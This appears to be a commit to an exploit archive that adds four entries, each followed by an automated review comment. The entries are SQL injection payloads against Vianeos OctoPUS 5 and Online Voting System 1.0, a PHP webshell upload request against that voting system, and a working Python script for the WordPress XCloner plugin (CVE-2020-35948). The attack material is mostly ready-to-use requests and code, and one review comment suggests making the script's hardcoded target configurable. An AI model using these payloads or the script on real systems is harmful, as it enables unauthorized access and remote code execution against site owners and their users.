DB: 2021-07-02

4 changes to exploits/shellcodes

Online Voting System 1.0 - Authentication Bypass (SQLi)
Online Voting System 1.0 - Remote Code Execution (Authenticated)
Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)
Vianeos OctoPUS 5 - 'login_user' SQLi

parent 293ca2aadb
commit 4f3cf46cbf
5 changed files with 255 additions and 0 deletions
19 exploits/multiple/webapps/50078.txt Normal file
@ -0,0 +1,19 @@
# Exploit Title: Vianeos OctoPUS 5 - 'login_user' SQLi
# Date: 01/07/2021
# Exploit Author: Audencia Business SCHOOL
# Vendor Homepage: http://www.vianeos.com/en/home-vianeos/
# Software Link: http://www.vianeos.com/en/octopus/
# Version: > V5
# Tested on: Fedora / Apache2 / MariaDB


Octopus V5 SQLi

The "login_user =" parameter present in the POST authentication request is vulnerable to an Time Based SQLi as follow :

```
Parameter: login_user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: signin_user=1&login_user=1' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))xENj) AND 'OoKG'='OoKG&password_user=1
```
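Review bot: the advisory never names the endpoint that receives the POST (only "the POST authentication request"), so the sqlmap output cannot be tied to a concrete request; add the request path, and state the exact build that was tested, since the title says OctoPUS 5 while the header says `# Version: > V5`. The `# Exploit Author: Audencia Business SCHOOL` line also differs from the "Audencia Business SCHOOL Red Team" credit in the CSV row for 50078, and the `# Date: 01/07/2021` header uses a day-first format where the CSV uses 2021-07-01. Wording: "vulnerable to an Time Based SQLi as follow :" should read "vulnerable to a time-based SQLi as follows:". The entry would be more useful to defenders if it stated the remediation: bind `login_user` through a prepared statement instead of interpolating it into the query, which removes the SLEEP-based timing oracle the payload relies on.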
35 exploits/php/webapps/50075.txt Normal file
@ -0,0 +1,35 @@
# Exploit Title: Online Voting System 1.0 - Authentication Bypass (SQLi)
# Exploit Author: deathflash1411
# Date 30.06.2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html
# Version 1.0
# Tested on: Ubuntu 20.04

####################
# Proof of Concept #
####################

POST /Online_voting_system/admin/ HTTP/1.1
Host: localhost
Content-Length: 50
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/Online_voting_system/admin/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a
Connection: close

UserName=admin&Password=%27+or+%27%27%3D%27&Login=

###########
# Payload #
###########

UserName=admin
Password=' or ''='
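Review bot: `# Exploit Author: deathflash1411` does not match the CSV row for 50075, which credits "Salman Asad"; one of the two should be changed (or the handle added in parentheses) so the entry is attributed consistently. The `# Date 30.06.2021` and `# Version 1.0` headers are also missing the colon the other fields use, and the date should be ISO (2021-06-30) to match the CSV column. On substance, the PoC shows only the request (the `Content-Length: 50` does match the 50-byte body); a line pointing at where the admin login code concatenates the `Password` parameter into its query would let a reader confirm the root cause, and the fix is worth stating in the file: a parameterized query plus a password-hash comparison, so the `' or ''='` tautology is never evaluated as SQL.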
76 exploits/php/webapps/50076.txt Normal file
@ -0,0 +1,76 @@
# Exploit Title: Online Voting System 1.0 - Remote Code Execution (Authenticated)
# Exploit Author: deathflash1411
# Date 30.06.2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html
# Version 1.0
# Tested on: Ubuntu 20.04

####################
# Proof of Concept #
####################

POST /Online_voting_system/admin/save_candidate.php HTTP/1.1
Host: localhost
Content-Length: 1253
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4G9QRpniTS7gPVqW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/Online_voting_system/admin/new_candidate.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a
Connection: close

------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="user_name"

admin
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="rfirstname"

test
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="rlastname"

test
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="rgender"

Male
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="ryear"

1st year
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="rmname"

test
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="rposition"

Governor
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="party"

test
------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="image"; filename="test.php"
Content-Type: application/octet-stream

<?php echo exec("whoami"); ?>

------WebKitFormBoundary4G9QRpniTS7gPVqW
Content-Disposition: form-data; name="save"


------WebKitFormBoundary4G9QRpniTS7gPVqW--

########
# Note #
########

Uploaded file will be available at http://localhost/Online_voting_system/admin/upload/
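Review bot: the Note section says the uploaded file lands under `/Online_voting_system/admin/upload/` but not under which name, so a reader cannot tell from the file alone whether `save_candidate.php` keeps the client-supplied `filename="test.php"` or renames it; state the resulting path. Same attribution and header issues as 50075: `deathflash1411` versus the CSV's "Salman Asad", and `# Date 30.06.2021` / `# Version 1.0` without the colon and ISO date used elsewhere. The root cause visible in the request is that the `image` field is accepted with an arbitrary extension and an `application/octet-stream` content type and written into a web-served directory; the remediation worth noting is a server-side extension and MIME allow-list, a server-generated filename, and a web-server rule that refuses to execute scripts from `upload/`.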
121 exploits/php/webapps/50077.py Executable file
@ -0,0 +1,121 @@
# Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)
# Date 30.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.xcloner.com/
# Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip
# Version: 4.2.1 - 4.2.12
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-35948
# CWE: CWE-732
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md

'''
Description:
An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files,
including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php,
for example. Alternatively, an attacker could create an exploit chain to obtain a database dump.
'''


'''
Banner:
'''
banner = """


##### # # ####### ##### ### ##### ### ##### ####### ##### # #####
# # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # #
# # # ##### ##### ##### # # ##### # # ##### ##### ###### ###### # # #####
# # # # # # # # # # # # # ####### # #
# # # # # # # # # # # # # # # # # # # #
##### # ####### ####### ### ####### ### ##### ##### ##### # #####



by @Hacker5preme
"""
print(banner)


'''
Import required modules:
'''
import requests
import argparse


'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')
ajax_cmd = input('[*] Ajax Command to execute: ')

'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'

# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}

# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
auth_header= auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
    print('[+] Authentication successfull !')
else:
    print('[-] Authentication failed !')
    exit()


'''
Exploit:
'''
url_exploit = "http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup"

header = {
    "Accept": "*/*",
    "Content-Type": "multipart/form-data; boundary=------------------------08425016980d7357",
    "Connection": "close"
}

# Body:
body = "--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n" % (ajax_cmd)

exploit = session.post(url_exploit, headers=header, data=body)
print('')
print(exploit.text)
print('')
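Review bot: `url_exploit` in the Exploit section is hardcoded to `http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup` instead of being built from `target_ip`, `target_port` and `wp_path` the way `auth_url` is, so the `-T`, `-P` and `-U` arguments only affect the login step and the script cannot be run against any other host; build it the same way as `auth_url` (and drop the doubled slash). Two smaller points: `auth_header= auth.headers['Set-Cookie']` raises a `KeyError` if the login response carries no `Set-Cookie` header, which means the "Authentication failed" branch is skipped in favour of a traceback; looking for a `wordpress_logged_in` cookie in `session.cookies` would be the more robust check. The file is committed as executable but has no shebang line, so `./50077.py` will not run it. Header hygiene: `# Date 30.06.2021` lacks the colon and ISO format used by the other fields; `# Version: 4.2.1 - 4.2.12` does agree with the "before 4.2.13" in the description.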
@ -44207,9 +44207,13 @@ id,file,description,date,author,type,platform,port
50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php,
50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,
50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php,
50075,exploits/php/webapps/50075.txt,"Online Voting System 1.0 - Authentication Bypass (SQLi)",2021-07-01,"Salman Asad",webapps,php,
50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",2021-06-30,"Murat DEMİRCİ",webapps,php,
50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",2021-06-28,Captain_hook,webapps,macos,
50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",2021-06-28,"Bryan Leong",webapps,hardware,
50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",2021-06-30,"Alejandro Perez",webapps,php,
50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",2021-06-30,"Dolev Farhi",webapps,multiple,
50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,
50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",2021-07-01,"Salman Asad",webapps,php,
50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",2021-07-01,"Ron Jost",webapps,php,
50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,
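Review bot: the four added rows (50075, 50076, 50077, 50078) disagree with the files they index: 50075 and 50076 credit "Salman Asad" while both files carry `# Exploit Author: deathflash1411`, and 50078 credits "Audencia Business SCHOOL Red Team" while the file says "Audencia Business SCHOOL"; settle on one spelling per entry in both places. All four rows carry 2021-07-01, while the files are dated 30.06.2021 (50075, 50076, 50077) and 01/07/2021 (50078), so the date column is not copied from the headers either. The hunk itself is consistent with its `@@` counts (9 context rows, 4 additions), and the empty trailing `port` column matches the neighbouring rows.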